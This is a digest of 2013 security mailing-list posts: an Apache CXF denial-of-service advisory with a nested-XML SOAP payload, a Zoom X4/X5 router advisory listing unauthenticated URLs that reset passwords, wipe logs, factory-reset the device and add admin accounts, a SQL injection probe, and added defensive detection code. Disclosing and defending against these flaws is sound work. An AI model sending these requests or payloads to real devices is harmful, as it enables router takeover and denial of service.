Re: re: Real player resource exhaustion Vulnerability
Please find below updated Impact information

CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6

CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type:Allows disruption of serviceUnknown
[HITB-Announce] REMINDER: #HITB2013KUL CFP Closes 25th July
Hi everyone,

Just a gentle reminder that the Call for Papers for the 11th annual HITB Security Conference in Malaysia, #HITB2013KUL, closes on the 25th of July at 23:59 MYT! As always, we're looking for talks that are highly technical, but most importantly, material which is new, cutting edge and content that hasn't been seen before.

HITB CFP: http://cfp.hackinthebox.org/

The conference takes place at the Intercontinental Kuala Lumpur on the 16th and 17th of October in a triple-track format with keynote speakers Joe Sullivan (Chief Security Officer for Facebook) and Andy Ellis (Chief Security Officer at Akamai). Alongside the main conference, there will also be an open to public lock picking village run by TOOOL, a technology showcase area/exhibition area, a 24-hour developer hackathon (HackWEEKDAY) and of course a team-based Capture The Flag competition!

Event Website: http://conference.hitb.org/

===

Each accepted submission will entitle the speaker(s) to accommodation for 3 nights / 4 days and travel expense reimbursement up to EUR1200.00 per speaking slot.

Topics of interest include, but are not limited to the following:

Cloud Security
File System Security
3G/4G/WIMAX Security
SS7/GSM/VoIP Security
Security of Medical Devices
Critical Infrastructure Security
Smartphone / Mobile Security
Smart Card and Physical Security
Network Protocols, Analysis and Attacks
Applications of Cryptographic Techniques
Side Channel Analysis of Hardware Devices
Analysis of Malicious Code / Viruses / Malware
Data Recovery, Forensics and Incident Response
Hardware based attacks and reverse engineering
Windows / Linux / OS X / *NIX Security Vulnerabilities
Next Generation Exploit and Exploit Mitigation Techniques
NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security

WHITE PAPER: If your presentation is short listed for inclusion into the conference program, a technical white paper must also be provided for review (3000 - 5000 words).

Your submissions will be reviewed by The HITB CFP Review Committee:

Charlie Miller (formerly Principal Research Consultant, Accuvant Labs)
Katie Moussouris, Senior Security Strategist, Microsoft
Itzik Kotler, Chief Technology Officer, Security Art
Cesar Cerrudo, Chief Technology Officer, IOActive
Jeremiah Grossman, Founder, Whitehat Security
Andrew Cushman, Senior Director, Microsoft
Saumil Shah, Founder/CEO, Net-Square
Thanh 'RD' Nguyen, THC, VNSECURITY
Alexander Kornbrust, Red Database
Fredric Raynal, QuarksLab
Shreeraj Shah, Founder, BlueInfy
Emmanuel Gadaix, Founder, TSTF
Andrea Barisani, Inverse Path
Philippe Langlois, TSTF
Ed Skoudis, InGuardians
Haroon Meer, Thinkst
Chris Evans, Google
Raoul Chiesa, TSTF/ISECOM
rsnake, SecTheory
Gal Diskin, Intel
Skyper, THC

Note: We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferencei...@hackinthebox.org

See you in October!

---
Hafez Kamal, HITB Conference Core Crew (.MY)
Hack in The Box (M) Sdn. Bhd.
36th Floor, Menara Maxis, Kuala Lumpur City Centre,
50088 Kuala Lumpur, Malaysia
Tel: +603-26157299 Fax: +603-26150088
PGP Key ID: 0xC0DC7DF8
SEC Consult SA-20130709-0 :: Denial of service vulnerability in Apache CXF
SEC Consult Vulnerability Lab Security Advisory 20130709-0
===
title: Denial of service vulnerability
product: Apache CXF
vulnerable version: Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4
fixed version: Apache CXF 2.5.10, 2.6.7 and 2.7.4 onwards
CVE number: CVE-2013-2160
impact: Critical
homepage: http://cxf.apache.org/
found: 2013-02-01
by: Andreas Falkenberg, SEC Consult Vulnerability Lab
    Christian Mainka, Ruhr-University Bochum
    Juraj Somorovsky, Ruhr-University Bochum
    Joerg Schwenk, Ruhr-University Bochum
    https://www.sec-consult.com
===

Vendor/product description:
--
Apache CXF is an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS. These services can speak a variety of protocols such as SOAP, XML/HTTP, RESTful HTTP, or CORBA and work over a variety of transports such as HTTP, JMS or JBI.

URL: http://cxf.apache.org/

Business recommendation:
--
Various denial of service attack vectors were found within Apache CXF. The recommendation of SEC Consult is to immediately perform an update.

Vulnerability overview/description:
--
It is possible to execute Denial of Service attacks on Apache CXF, exploiting the fact that the streaming XML parser does not put limits on things like the number of elements, number of attributes, the nested structure of the document received, etc. The effects of these attacks can vary from causing high CPU usage, to causing the JVM to run out of memory.

URL: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc

Proof of concept:
--
The following SOAP message will trigger a denial of service:

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <element>
      <element>
        <element>
          <element>
            [thousands more]
          </element>
        </element>
      </element>
    </element>
  </soap:Body>
</soap:Envelope>

There are various other XML payloads that will also trigger a denial of service on vulnerable services.

Vulnerable / tested versions:
--
This vulnerability affects all versions of Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4.

Vendor contact timeline:
--
2013-02-22: Advisory sent to vendor by Juraj Somorovsky (RUB)
2013-02-22: Advisory acknowledged by vendor
2013-04-19: Vendor confirms vulnerability
2013-05-15: Vendor publishes fixed version
2013-06-27: Vulnerability is disclosed by vendor
2013-07-09: SEC Consult releases security advisory

Solution:
--
CXF 2.5.x users should upgrade to 2.5.10 or later as soon as possible.
CXF 2.6.x users should upgrade to 2.6.7 or later as soon as possible.
CXF 2.7.x users should upgrade to 2.7.4 or later as soon as possible.

Also see the advisory of the vendor:
http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc

Workaround:
--
No workaround available.

Advisory URL:
--
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Andreas Falkenberg / @2013
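The limits the advisory describes as missing (element count, nesting depth, attribute count) can be enforced in any streaming parser before the whole payload is materialised. The following is an added illustration written for this digest in Python with expat; it is not Apache CXF's code (CXF's fix lives in its own StAX parser), and the SOAP payload it checks is a constructed sample shaped like the PoC above.

```python
import xml.parsers.expat

class XmlLimitExceeded(Exception):
    """Raised as soon as a limit is hit, before the rest of the document is read."""

def check_xml_limits(data, max_depth=64, max_elements=10000, max_attrs=64):
    """Stream-parse `data` with expat and abort on the first exceeded limit.
    Returns (deepest_nesting, element_count) if the document stays within limits.
    Hypothetical guard for illustration; CXF's fix lives in its own StAX parser."""
    state = {"depth": 0, "deepest": 0, "count": 0}
    parser = xml.parsers.expat.ParserCreate()

    def start_element(name, attrs):
        state["count"] += 1
        state["depth"] += 1
        state["deepest"] = max(state["deepest"], state["depth"])
        # Checked per element, so CPU and memory are bounded by the limits rather
        # than by the attacker's payload size (the failure mode in the advisory).
        if state["count"] > max_elements:
            raise XmlLimitExceeded(f"more than {max_elements} elements")
        if state["depth"] > max_depth:
            raise XmlLimitExceeded(f"nesting deeper than {max_depth}")
        if len(attrs) > max_attrs:
            raise XmlLimitExceeded(f"<{name}> carries more than {max_attrs} attributes")

    def end_element(name):
        state["depth"] -= 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.Parse(data, True)  # exceptions raised in the handlers propagate out of here
    return state["deepest"], state["count"]

def nested_soap(depth):
    """Constructed sample shaped like the PoC: `depth` nested <element> tags inside
    a SOAP 1.2 Body (the advisory's payload uses thousands)."""
    return ('<?xml version="1.0"?>'
            '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
            '<soap:Body>' + '<element>' * depth + '</element>' * depth
            + '</soap:Body></soap:Envelope>')

if __name__ == "__main__":
    print(check_xml_limits(nested_soap(4)))  # (6, 6): Envelope, Body and four elements
    try:
        check_xml_limits(nested_soap(5000))
    except XmlLimitExceeded as exc:
        print("rejected:", exc)
```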
Re: re: Real player resource exhaustion Vulnerability
On Tue, Jul 09, 2013 at 07:17:35AM +, akshay.vagh...@cyberoam.com wrote:
> Impact Type:Allows disruption of serviceUnknown

Unknown?

---
Henri Salo
Zoom X4/X5 ADSL Modem and Router -Unauthenticated Remote Root Command Execution
Vulnerable Products
-
Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0 Virata-EmWeb/R6_2_0 Server, all GS Firmware versions
Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0 Virata-EmWeb/R6_2_0 Server, all GS Firmware versions

Note: A similar vulnerability was reported several years ago on the Zoom X3 ADSL Modem using a SOAP API call. Many of these vulnerabilities affect X3 in the same manner, without needing to use a SOAP API.

===

Vulnerability
-
When UPnP services and WAN http administrative access are enabled, authorization and credential challenges can be bypassed by directly accessing root privileged abilities via a web browser URL. All aspects of the modem/router can be changed, altered and controlled by an attacker, including gaining access to and changing the PPPoE/PPP ISP credentials.

Timeline with Vendor
-
Have had no response from Zoom Telephonics since first reporting the problem on June 28. Subsequent emails have been sent with no response.

Root Cause Observed
-
- As in most IGD UPnP routers and modems, where root vulnerabilities are prevalent, these modems contain the same privileged tunnel between either side of the router to be traversed without authentication. The code and layout of the device plays a large role as well.

Code/Script Vulnerabilities
-
- Form tags and action ids usually hidden are easily seen from the HTML source; no sanitization of client side input is occurring and root overrides such as 'Zadv=1' can be invoked by any user.
- No cookie authentication is done once any of the first bypasses is executed, allowing Cookie: sessionId=invalid to pass admin commands.
- The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of any URL page calling a table value, such as /MainPage?id=25, will bring up the system status page, with each interface visible and selectable.

Patches or Fixes
-
At this time, there are no known patches or fixes.

Vulnerability proofs and examples
-
All administrative items can be accessed through these two URLs:
- Menu Banner: http://IP/hag/pages/toc.htm
- Advanced Options Menu: http://IP/hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser URL, or a modified HTTP GET/POST request:

- Change Password for admin Account
  On Firmware 2.5 or lower:
  http://IP/hag/emweb/PopOutUserModify.htm/FormOneuser=adminex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes
  On Firmware 3.0:
  http://IP/hag/emweb/PopOutUserModify.htm?id=40user=adminZadv=1ex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes

- Clear Logs
  http://IP/Action?id=76cmdClear+Log=Clear+Log

- Remote Reboot to Default Factory Settings
  Warning - For all intents and purposes, this action will almost always result in a long term Denial of Service attack.
  http://IP/Action?reboot_loc=1id=5cmdReboot=Reboot

- Create New Admin or Intermediate Account
  On Firmware 2.5 or lower:
  http://IP/hag/emweb/PopOutUserAdd.htm?id=70user_id=newintermediateaccountpriv=v2pass1=123456pass2=123456cmdSubmit=Save+Changes
  On Firmware 3.0:
  http://IP/hag/emweb/PopOutUserAdd.htm?id=70Zadv=1ex_param1=adminuser_id=newadminaccountpriv=v1pass1=123456pass2=123456cmdSubmit=Save+Changes

Mitigation and Workarounds
-
- Adv.Options -> UPnP -> Disable UPnP -> Write Settings to Flash -> Reboot
- Adv.Options -> Firewall Configuration -> Enable 'Attack Protection', 'DOS Protection', 'Black List' -> Write Settings to Flash
- Adv.Options -> Management Control -> Disable WAN Management from all fields -> Write Settings to Flash
- Always change the default Username and Password, though this will not help mitigate this vulnerability.
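Since the vendor has shipped no fix, detection of the request patterns the advisory lists is the remaining control besides disabling UPnP and WAN management. The following Python is an added example written for this digest, not code from the reporter or from Zoom: it flags requests to the unauthenticated admin pages, the 'Zadv=1' override, the bogus session cookie and the UNION SELECT probe in a constructed log of traffic to the modem (the simple `<src_ip> <method> <url> <cookie|->` line format and the sample addresses are assumptions).

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators taken from the advisory: the two menu pages, the account pages and
# the /Action handler, the 'Zadv=1' root override, the bogus session cookie and
# the UNION SELECT probe. None of this is vendor code.
ADMIN_PAGES = {"/hag/pages/toc.htm", "/hag/pages/toolbox.htm",
               "/hag/emweb/PopOutUserModify.htm",
               "/hag/emweb/PopOutUserAdd.htm", "/Action"}
SQLI_PROBE = re.compile(r"union\s+select", re.IGNORECASE)

def classify_request(src_ip, url, cookie=""):
    """Return the indicator names one request triggers (empty list if none)."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    query = unquote(parts.query)
    hits = []
    if path in ADMIN_PAGES:
        hits.append("admin-page")
    if "1" in parse_qs(query).get("Zadv", []):
        hits.append("zadv-root-override")
    if "sessionId=invalid" in cookie:
        hits.append("invalid-session-cookie")
    if SQLI_PROBE.search(query):
        hits.append("sqli-probe")
    # A hit from a non-private source shows WAN management is still reachable.
    if hits and not ipaddress.ip_address(src_ip).is_private:
        hits.append("from-wan")
    return hits

def scan_log(text):
    """Parse constructed lines '<src_ip> <method> <url> <cookie|->' and return
    [(src_ip, url, hits)] for every line that triggers at least one indicator."""
    findings = []
    for line in text.strip().splitlines():
        src_ip, _method, url, cookie = line.split(maxsplit=3)
        hits = classify_request(src_ip, url, "" if cookie == "-" else cookie)
        if hits:
            findings.append((src_ip, url, hits))
    return findings

# Constructed sample traffic: a benign LAN request, probes from one public
# address, and a benign request from another public address.
SAMPLE_LOG = """\
192.168.1.10 GET /MainPage?id=25 -
93.184.216.34 GET /hag/pages/toolbox.htm -
93.184.216.34 GET /MainPage?id=25%20UNION%20SELECT%201,2,3,4,5,6,7-- -
93.184.216.34 POST /hag/emweb/PopOutUserModify.htm?id=40&Zadv=1 sessionId=invalid
1.1.1.1 GET /index.html -
"""
```

Running `scan_log(SAMPLE_LOG)` yields three findings; a device that is correctly locked down per the mitigations above should never produce the "from-wan" tag.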